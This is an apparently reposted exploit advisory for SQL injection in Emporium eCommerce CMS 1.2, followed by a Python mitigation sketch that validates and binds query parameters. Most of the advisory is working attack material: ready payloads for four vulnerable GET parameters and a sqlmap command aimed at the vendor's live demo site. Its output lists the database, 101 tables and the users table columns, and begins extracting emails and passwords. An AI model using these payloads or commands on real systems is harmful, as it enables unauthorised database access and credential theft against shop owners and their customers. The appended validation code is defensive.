Emporium eCommerce Online Shopping CMS 1.2 SQL Injection

20 Jul 2022 00:00:00
Reported by: CraCkEr
Type: packetstorm
Source: packetstormsecurity.com

Emporium eCommerce v 1.2 SQL Injection

Code
`Author    : CraCkEr
Website   : mybizcms.com
Vendor    : mybizcms
Software  : Emporium eCommerce - Online Shopping CMS v 1.2
Vuln Type : Remote SQL Injection
Method    : GET
Critical  : High
Impact    : Database Access

Emporium eCommerce is a complete online shopping platform for all your needs

B4nks-NET irc.b4nks.tk #unix

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to
system compromise.

Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

There are 4 parameters vulnerable to SQL injection in /categories/other-categories?  
  
  
GET parameter 'min_price' is vulnerable  
  
---  
Parameter: min_price (GET)  
Type: error-based  
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)  
Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)  
Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41  
---  
  
GET parameter 'percentage' is vulnerable.  
  
---  
Parameter: percentage (GET)  
Type: boolean-based blind  
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)  
Payload: percentage=MAKE_SET(4728=4728,5649)  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)  
---  
  
GET parameter 'review_ratings' is vulnerable  
  
---  
Parameter: review_ratings (GET)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)  
---  
  
GET parameter 'brand[]' is vulnerable  
  
---  
Parameter: brand[] (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: brand[]=15');SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc  
---  
  
Live Demo Site:  
  
https://mybizcms.com/demos/multivendor/  
  
  
[+] Starting the Attack  
  
sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent  
  
[INFO] the back-end DBMS is MySQL  
web application technology: Apache, PHP 7.3.33, PHP  
back-end DBMS: MySQL >= 5.0 (MariaDB fork)  
[INFO] fetching current database  
current database: 'mybizcms_multivendor'  
  
  
fetching tables for database: 'mybizcms_multivendor'  
[101 tables]  
  
+--------------------------+  
| returns |  
| ad_placements |  
| addresses |  
| ads |  
| attribute_items |  
| attributes |  
| authorize_net_settings |  
| brands |  
| categories |  
| collections |  
| company |  
| counties |  
| countries |  
| credit_card_types |  
| cronjobs |  
| customers |  
| deliveries |  
| delivery_items |  
| delivery_options |  
| delivery_status |  
| discounts |  
| email_templates |  
| facebook_settings |  
| faqs |  
| flash_sale_items |  
| flash_sales |  
| flutterwave_settings |  
| github_settings |  
| google_settings |  
| item_status |  
| labels |  
| linkedin_settings |  
| logs |  
| media |  
| mpesa_settings |  
| newsletters |  
| notifications |  
| options |  
| order_details |  
| order_items |  
| order_status |  
| orders |  
| pages |  
| payment_options |  
| payment_status |  
| payments |  
| payout_modes |  
| payout_status |  
| payouts |  
| paypal_pro_settings |  
| paypal_standard_settings |  
| paytm_settings |  
| payu_money_settings |  
| permissions |  
| pesapal_settings |  
| pickup_stations |  
| post_categories |  
| post_comments |  
| posts |  
| product_attributes |  
| product_images |  
| product_reviews |  
| product_stock |  
| product_types |  
| product_variants |  
| product_wholesales |  
| products |  
| quicks |  
| return_reasons |  
| return_status |  
| rewards |  
| role_sub_permissions |  
| roles |  
| saved_items |  
| sessions |  
| shipping_fees |  
| shipping_regions |  
| shipping_weights |  
| shops |  
| sliders |  
| stripe_settings |  
| sub_permissions |  
| subscribers |  
| supported_currencies |  
| tags |  
| taxes |  
| temp_data |  
| ticket_priority |  
| ticket_replies |  
| ticket_status |  
| tickets |  
| timezones |  
| twitter_settings |  
| twocheckout_settings |  
| user_status |  
| user_sub_permissions |  
| users |  
| variant_choices |  
| variant_options |  
| wallets |  
| weights |  
+--------------------------+  
  
fetching columns for table 'users' in database 'mybizcms_multivendor'  
  
Table: users  
[34 columns]  
  
+------------------------+--------------+  
| Column | Type |  
+------------------------+--------------+  
| calling_code | varchar(11) |  
| city | varchar(100) |  
| company | varchar(100) |  
| country_id | int(11) |  
| date_added | datetime |  
| default_billing | int(11) |  
| default_currency | int(11) |  
| default_language | varchar(40) |  
| default_shipping | int(11) |  
| department_id | int(11) |  
| email | varchar(100) |  
| firstname | varchar(50) |  
| last_ip | varchar(40) |  
| last_login | datetime |  
| last_password_change | datetime |  
| lastname | varchar(50) |  
| latitude | varchar(300) |  
| longitude | varchar(300) |  
| new_pass_key_requested | datetime |  
| passkey | varchar(32) |  
| password | varchar(256) |  
| payout_address | longtext |  
| payout_mode_id | int(11) |  
| phone | varchar(30) |  
| postal_code | varchar(100) |  
| profile_image | varchar(150) |  
| role_id | int(11) |  
| state | varchar(50) |  
| street | varchar(100) |  
| user_id | int(11) |  
| user_status_id | int(11) |  
| user_uid | varchar(50) |  
| username | varchar(100) |  
| zip_code | varchar(15) |  
+------------------------+--------------+  
  
fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor'  
  
Database: mybizcms_multivendor  
Table: users  
[7 entries]  
  
  
  
  
[-] Done  
`
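Mitigation sketch for the four parameters listed above (an added example, not code from the advisory or from the vendor): every filter value is checked against a strict numeric shape and then bound as a query parameter, so the SQL text never contains request data. The `products` table, its column names and the helpers `build_query`, `demo_db` and `search` are hypothetical; `max_price` and `storage[]`, which appear in the payload strings, get the same treatment.

```python
import re
import sqlite3
from urllib.parse import parse_qs

INT = re.compile(r"[0-9]{1,9}")
PRICE = re.compile(r"[0-9]{1,9}(\.[0-9]{1,2})?")
# name -> (allowed shape, cast, SQL fragment). The parameter names come from the
# advisory; the column names are hypothetical, since the page does not show the schema.
SCALARS = {"min_price": (PRICE, float, "price >= ?"),
           "max_price": (PRICE, float, "price <= ?"),
           "percentage": (INT, int, "discount_pct >= ?"),
           "review_ratings": (INT, int, "rating >= ?")}
LISTS = {"brand[]": "brand_id", "storage[]": "storage_id"}

def build_query(query_string):
    """Return (sql, args); raise ValueError on any value that is not a plain number."""
    raw = parse_qs(query_string, keep_blank_values=True)
    where, args = [], []
    for name, (shape, cast, clause) in SCALARS.items():
        values = raw.get(name, [])
        if len(values) > 1 or not all(shape.fullmatch(v) for v in values):
            raise ValueError(f"rejected {name}")
        if values:
            where.append(clause)
            args.append(cast(values[0]))
    for name, column in LISTS.items():
        values = raw.get(name, [])
        if len(values) > 50 or not all(INT.fullmatch(v) for v in values):
            raise ValueError(f"rejected {name}")
        if values:
            # Only the number of placeholders varies; the values are bound separately.
            where.append(f"{column} IN ({','.join('?' * len(values))})")
            args.extend(int(v) for v in values)
    sql = "SELECT product_id FROM products"
    return (sql + " WHERE " + " AND ".join(where) if where else sql), args

def demo_db():
    """Constructed in-memory table standing in for the shop's product data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (product_id INTEGER, price REAL, "
                 "discount_pct INTEGER, rating INTEGER, brand_id INTEGER, storage_id INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?,?,?,?,?,?)",
                     [(1, 100.0, 40, 4, 15, 41), (2, 500.0, 10, 2, 16, 41)])
    return conn

def search(conn, query_string):
    # sqlite3 binds with ?, MySQL drivers typically use %s; the principle is the same.
    sql, args = build_query(query_string)
    return [row[0] for row in conn.execute(sql, args)]
```

A request that fails validation should be answered with HTTP 400 and logged, since a non-numeric value in these fields has no legitimate source.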
